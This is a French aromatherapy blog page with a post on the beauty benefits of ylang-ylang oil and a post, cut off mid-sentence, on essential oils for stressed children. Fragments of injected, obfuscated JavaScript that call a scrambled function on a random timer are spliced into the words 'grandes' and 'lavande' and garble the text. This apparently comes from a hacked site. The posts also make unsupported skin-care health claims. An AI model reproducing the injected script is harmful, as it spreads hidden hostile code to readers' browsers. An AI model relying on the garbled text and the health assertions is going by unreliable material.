6
sept

3 vertus beauté de l’huile essentielle d’Ylang-Ylang

3 vertus beauté de l’huile essentielle d’Ylang-Ylang
Share on FacebookTweet about this on TwitterPin on PinterestShare on Google+

La fleur d’ylang-ylang dont est extraite l’huile essentielle du même nom est particulièrement appréciée dans le monde de la parfumerie. Elle est d’ailleurs une des senteurs florales que l’on peut retrouver dans la recette de la fragrance Chanel n°5. ...

C’est un des produits de bio-cosmétique incontournable à garder dans sa trousse d’aromathérapie 100% beauté.


1 – Rajeunir et raffermir la peau

Alliée des peaux matures, l’huile essentielle d’ylang-ylang redonne de la fermeté à la peau tout en la tonifiant pour effet rajeunissant garanti.


2 – Réduire le sébum

Véritable cauchemar des peaux grasses à tendance acnéique, le sébum laisse  un film gras sur le visage qui brille constamment. L’huile essentielle d’ylang-ylang a la capacité de réguler les sécrétions de sébum au niveau de la peau visage ce qui la rend particulièrement utile contre l’acné.


3 – Réduire les tâches brunes et les vergetures

Elle est aussi utilisée pour traiter des problèmes de peau comme les taches brunes au niveau du visage ou les vergetures sur les seins, les cuisses ou le ventre.

4
sept

C’est la rentrée !

une-rentrée-sous-le-signe-huile-essentielle
Share on FacebookTweet about this on TwitterPin on PinterestShare on Google+

Pour nos petits bouts de chou aussi la rentrée est source de stress, d'angoisse, de fatigue et de troubles du sommeil sans oublier les autres petits problèmes : bobos, poux ... Pour les aider à mieux appréhender la rentrée, vous pouvez compter sur les huiles essentielles. Pour vous aider à y voir un peu plus clair, nous avons sélectionné des huiles essentielles à utiliser sans danger avec vos enfants.


Une rentrée scolaire sans stress

Après les grandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andes vacances d’été, le retour à l’école n’enthousiasme pas les enfants qui peuvent être soumis à un stress : première rentrée scolaire, changement de classe, passage de la maternelle à la primaire … Pour évacuer ce stress, rien de mieux que la diffusion dhuiles essentielles connues pour leurs propriétés calmantes et apaisantes.

Vous pouvez opter aussi pour un massage relaxant anti-stress à base d’huile essentielle à condition de bien diluer les huiles essentielles dans une huile végétale. Plusieurs huiles essentielles sont appréciées pour leurs vertus calmantes et relaxantes : prenez de l’huile essentielle de lavandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande ou camomille noble à diluer dans une huile végétale de jojoba, noyau d’abricot ou calendula selon vos goûts mais aussi les préférences de votre bambin.

Côté pratique : 1 goutte dans l’huile végétale pour un massage relaxant.


Trouvez le bon rythme

Reprendre un bon rythme après plus de deux mois à la maison, ce n’est pas facile aussi bien pour les adultes que pour les enfants. La période d’adaptation au nouveau rythme est souvent précédée d’une période de forte fatigue qu’il faut gérer pour éviter les réveils pénibles tous les matins.

Rien de mieux qu’un bon bain relaxant et détendant aromatisé aux huiles essentielles : choisissez l’